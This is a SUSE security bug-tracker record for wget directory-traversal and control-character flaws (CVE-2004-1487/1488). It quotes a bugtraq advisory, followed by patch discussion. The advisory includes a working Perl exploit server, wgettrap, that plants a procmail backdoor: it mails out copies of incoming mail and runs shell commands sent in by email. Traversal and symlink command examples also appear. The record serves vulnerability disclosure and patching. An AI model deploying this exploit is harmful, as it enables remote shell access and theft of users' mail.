Bug 64183 (CVE-2004-1488)

Summary: VUL-0: CVE-2004-1488: multiple wget flaws
Product: [Novell Products] SUSE Security Incidents Reporter: Ludwig Nussel <lnussel>
Component: IncidentsAssignee: Marcus Meissner <meissner>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: mls, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: All   
OS: Linux   
Whiteboard: CVE-2004-1488: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Found By: Other Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: the patch for ".."
New patch handling .. issue
wgettrap.pl

Description Ludwig Nussel 2004-12-13 21:05:45 UTC 
We received the following report via bugtraq.
The issue is public.

Ugly but probably not as critical as this guy makes it sound like.
Since he is talking about Debian I suppose you can snatch some
patches from them.

Date: Thu, 9 Dec 2004 09:14:38 +0000
From: Jan Minar <jjminar@FastMail.FM>
To: bugtraq@securityfocus.com
Subject: wget: Arbitrary file overwriting/appending/creating and other vulnerabilities

------------------------------------------------------------------------
Summary
------------------------------------------------------------------------
Product:   wget
Versions:  1.8.x
Versions:  1.9.x (to lesser extent)
Versions:  Versions < 1.8 are probably vulnerable too
Platforms: Linux, probably POSIX, others?
Tested:    1.8.1-6 (Debian Woody)
           1.9.1-4 (Debian Sarge)
Problems:  Overwriting/appending/creating files and directories
           Retrieving file existence, size, permissions info
	   Etc.
Remote?:   Both remote and local
Author:	   Jan Minar <jjminar foo fastmail bar fm>

------------------------------------------------------------------------
Background
------------------------------------------------------------------------

``GNU wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols. It is a
non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows [sic!] support, etc.''

	-- http://www.gnu.org/software/wget/wget.html

wget(1) is the de facto standard HTTP retrieval program on GNU/Linux,
both for interactive use and for use in scripts and programs.  76
packages in the Debian Sarge currently depend on the wget package.

------------------------------------------------------------------------
Vulnerabilities
------------------------------------------------------------------------

(0) Wget authors are/were incompetent.  Everything else is a corollary.

In the current maintainer's own words: ``[T]he code is buggy, poorly
commented, very hard to understand, extremely resistant to changes and
looks like a bunch of patches put together in a careless way.
[I]t badly needs a lot of auditing and rewriting.''

	-- Mauro Tortonesi in a private mail exchange with me

Note: Wget has numerous commandline options which are relevant to these
vulnerabilities.

(1) Wget doesn't know which files it is permitted to write to

Wget erroneously thinks that the current directory is a fair game, and
will happily write in any file in and below it.  Malicious HTTP response
or malicious HTML file can redirect wget to a file that is vital to the
system, and wget will create/append/overwrite it.

$ cd /home/user
$ wget http://localhost/wgettrap.bashrc
	-> .bashrc

(2) Wget doesn't sanitize the redirection data properly

Wget apparently has at least two methods of ``sanitizing'' the
potentially malicious data it receives from the HTTP stream, therefore a
malicious redirects can pass the check.  We haven't find a way to trick
wget into writing above the parent directory, which doesn't mean it's
not possible.

# cd /root [1]
# wget -x http://localhost/wgettrap.redirect-1.9
	-> ../lib/libc-2.2.5.so   [2]

$ cd /foo/bar
$ wget -r http://localhost/wgettrap.redirect-1.8
$	-> ../../../../../../../../../home/jan/.bashrc	[1]
	-> ../../../../../../../../../var/www/jan/.htaccess

[1] If inetd is not running on the system, the user name can be
social-engineered, or guessed from preceding traffic.

[2] '..' must resolve to an IP address of the malicious server, or at
least to an address, provided that we will be able to stuff data in the
HTTP stream afterwards.  The POC doesn't exploit this.


(3) Wget prints control characters to the terminal verbatim

Malicious HTTP response can overwrite parts of the terminal so that the
user will not notice anything wrong, or will believe the error was not
fatal.  See the [1]Debian bug 411755 for details.

[1] http://bugs.debian.org/261755

(4) Just about any stupid hack will work with wget.  %00 bytes (see the
POC) and other %-escaped control characters handling, symlink attacks:
	
	$ cd /tmp
	$ ln -s index.html /path/to/foo
	$ wget -x http://localhost/
		-> /path/to/foo

------------------------------------------------------------------------
Reproduction
------------------------------------------------------------------------

A proof of concept is attached.

------------------------------------------------------------------------
Patched versions
------------------------------------------------------------------------

Not available.

------------------------------------------------------------------------
Workarounds
------------------------------------------------------------------------

(1) Don't use programs/scripts which use wget internally.

(2) Use alternative retrieval programs, such as pavuk, axel, or
ncftpget.

(3) Use the -o and -O options.

(4) Create two levels of new directories, cd to the directories, only
then run wget (won't protect you when using version <= 1.8 with
'-x' or '-r'):

   	$ mkdir sand/box
	$ cd sand/box
	$ wget http://localhost/

------------------------------------------------------------------------
Bug history
------------------------------------------------------------------------

We discovered this bug few months earlier.  We contacted the Debian
package maintainer and the Debian Security Team on 2004-10-03.  The wget
maintainer had not been responding to emails at that time, so we didn't
contact him.  Few days ago, a new maintainer was appointed, who
[1]disclosed this vulnerability.

[1] http://wget-bugs.ferrara.linux.it/msg12


-- 
 )^o-o^|    jabber: rdancer@NJS.NetLab.Cz
 | .v  K    e-mail: jjminar FastMail FM
 `  - .'     phone: +44(0)7981 738 696
  \ __/Jan     icq: 345 355 493
 __|o|__Minář  irc: rdancer@IRC.FreeNode.Net

#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan MinĂĄĹ (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'
# 8-)).

use POSIX qw(strftime);

# This is our scheme/host/port
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server = "http://..";

# Wanna know who got infected? 
#$log = "/dev/pts/1";

# The filename we will try to overwrite on the target system
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";

############### Payload #########################################
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
* ^X-Wgettrap-Command: shell
* ^X-Wgettrap-Password: $password
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'
EOP
chomp $payload;
############### Payload #########################################

# A simple directory traversal, for greater effect
$trick = "/.." . "%2f.." x 40;

open LOG, ">$log" if $log;

while(<STDIN>){
	print LOG $_ if $log;
	if (/\Q$trick$filename\E/) {
	#if (/%2f/) {
		# We see the filename, so this is the second time
		# they're here.  Time to feed the sploit.
		$second++;
	} elsif (/^Range: bytes=\(33\)-/) {
		# Appending goes like this:
		# (1) Tell'em what you're gonna tell'em
		# (2) Then tell'em just a half
		# (3) Close it
		# (4) Wait
		# (5) They're comin' back, with wget -c
		# (6) Tell'em the sploit
		# (7) Close again
		# (8) Wtf? They're comin' back with wget -c again
		# (9) Tell'em the rest...
		# (10) ... enjoying the backdoor at the same time
		print LOG "File if $1 bytes long\n" if $log;
	} elsif (/^\r?$/) {
		# The HTTP headers are over.  Let's do it!
		$date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
		if (!$second) {
			# Print the payload
			print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
		} else {
			# Print the redirection
			print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
		}
		exit 0;
	}
}
Comment 1 Marcus Meissner 2004-12-13 21:07:10 UTC 
*** Bug 64178 has been marked as a duplicate of this bug. ***
Comment 2 Mads Martin Joergensen 2004-12-13 21:27:54 UTC 
This is verdammt nasty. There is no fix yet, I'll keep an eye on for a fix.
Comment 3 Ludwig Nussel 2005-01-18 21:32:22 UTC 
any news?
Comment 4 Mads Martin Joergensen 2005-01-18 21:34:53 UTC 
No.
Comment 5 Thomas Biege 2005-02-09 06:32:32 UTC 
... and still no patch. :(
Comment 6 Thomas Biege 2005-02-14 22:09:45 UTC 
i'll ask the vendor-sec folks for a patch.
Comment 7 Thomas Biege 2005-02-15 19:49:28 UTC 
Mauro Tortonesi <mtortonesi@ing.unife.it> is the new maintainer of wget. 
 
mmj, do you like to ask him?
Comment 8 Marcus Meissner 2005-02-16 17:53:57 UTC 
CAN-2004-1487 - overwrite files via ".." in path component                       
CAN-2004-1488 - missing quote for control characters can scrunch the display
Comment 9 Sebastian Krahmer 2005-02-16 22:21:49 UTC 
is there any fix from the author yet? Did anyone contact him?
If not I can try to make a fix.
Comment 10 Thomas Biege 2005-02-17 19:21:20 UTC 
Sebastian,
we dont have a fix yet. Please try to make one. Thanks.
Comment 11 Sebastian Krahmer 2005-02-21 11:41:15 UTC 
Created attachment 28641 [details]
the patch for ".."

This is my proposal. Wget already has a translation
table for characters like ../ but as I understod the bug
if the hostname contains evil characters it fails
to clean them. I substiutute these character-sequences by '_'.
For the control-character output I have no clue.
Comment 12 Mads Martin Joergensen 2005-02-21 13:42:31 UTC 
Ok, do we need to do an update, or is fixing in STABLE enough?
Comment 13 Sebastian Krahmer 2005-02-21 13:48:43 UTC 
Dont know. Thomas? We are still missing a patch for
these control-character stuff. If we want to fix it at all.
Might be hard to wrap all printfs() there?
Comment 14 Thomas Biege 2005-02-22 10:25:15 UTC 
Yes the control-char bug is just the tip of the iceberg and constraints will change with new 
terminal types... so let's forget about it. 
 
But CAN-2004-1487 should be fixed for all affected versions since 8.2. 
 
Thanks for the patch, BTW.
Comment 15 Mads Martin Joergensen 2005-02-22 10:37:07 UTC 
Can I get a SWAMP ID here please?
Comment 16 Thomas Biege 2005-02-22 11:05:25 UTC 
gimmie a minute...
Comment 17 Thomas Biege 2005-02-22 11:10:11 UTC 
 SM-Tracker-445
Comment 18 Mads Martin Joergensen 2005-02-22 13:06:51 UTC 
Ok, submitted for all versions, including patchinfo. SLES9 is still pending
due to Ralf deciding whether or not he wants to fix the bad wget in SLES9 and thus
lose LFS support or not [ bug #47965 and bug #51031 ]
Comment 19 Thomas Biege 2005-02-23 08:07:42 UTC 
QA-Team: 
Please test wget very well because it was used ba YOU in the past. :)
Comment 20 Thomas Biege 2005-02-23 09:34:22 UTC 
I'll submit patchinfo files after the SLES9 case was finished.
Comment 21 Marcus Meissner 2005-03-01 12:37:25 UTC 
needs a decision from you, Ralf.
Comment 22 Marcus Meissner 2005-03-03 15:37:06 UTC 
ralf declined the rollback for now. 
 
please submit a wget without the rollback done/SLES9  
 
you can submit the current vcersion to done/SLES9-SP2 for SP2 inclusion.
Comment 23 Marcus Meissner 2005-03-03 16:57:23 UTC 
autobuild / mls did not like the patch: 
 
- it does replace ".." unconditionally, even within filenames. 
 
=> Use "/.." at least. 
 
 
- Suggestion from MLS is too:  
 
  The redirect handling should not change the filename retrieved at all,  
  this would be the prefered fix for this problem. 
 
=> redesign patch :/
Comment 24 Michael Schröder 2005-03-03 17:07:18 UTC 
Further comments: 
I don't think the "don't change the filename" is possible, so it's ok with 
me if ".." isn't unconditional replaced, e.g. "foo..bar" still works. 
 
Hmm, another idea: set a flag if you do a redirect and only sanitize the 
path if a redirect occurred, so users could still get dot files.
Comment 25 Sebastian Krahmer 2005-03-04 12:57:07 UTC 
The .. replace was meant that way. Whats the matter with someone creating
strange ".." files?
Theres also a translation table for other characters. If you
rather like /.. to be replaced, do it, its just one character
fix to the fix :-)
I remember the "fetch" utility from BSD has a similar behaivior,
it dislikes strange dots too.
Comment 26 Michael Schröder 2005-03-04 15:38:04 UTC 
Don't you think that your patch will break existing applications?
Comment 27 Mads Martin Joergensen 2005-03-07 11:01:26 UTC 
Ok, I thought this was blessed by vendor-sec?
Comment 28 Sebastian Krahmer 2005-03-07 11:06:43 UTC 
When I sent it around, at least nobody complained.
Comment 29 Sebastian Krahmer 2005-03-15 12:29:01 UTC 
Created attachment 31702 [details]
New patch handling .. issue

This is exectly the same patch except it matches /..
except only ..
Comment 30 Sebastian Krahmer 2005-03-15 12:29:33 UTC 
Please check in. Patchinfos can be the same.
Comment 31 Sebastian Krahmer 2005-03-23 10:53:42 UTC 
Plop plop. Please handle :)
Comment 32 Marcus Meissner 2005-04-05 14:05:45 UTC 
the wget maintainer was no longer in cc or assigned.. 
 
 
mmj there is a new patch attached. 
 
But I think we can even get rid of the "/.." cases since it is handled by 
the "/." case already. 
 
can you submit updated packages please
Comment 33 Marcus Meissner 2005-04-05 15:29:11 UTC 
taking care of it.
Comment 34 Marcus Meissner 2005-04-13 13:30:40 UTC 
Created attachment 33979 [details]
wgettrap.pl

perl script that was previously inlined now attached
Comment 35 Marcus Meissner 2005-04-14 11:05:12 UTC 
we released an update, but fixing the directory traversal issue and dot file 
overwrites issues only.
Comment 36 Thomas Biege 2009-10-13 20:03:50 UTC 
CVE-2004-1488: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)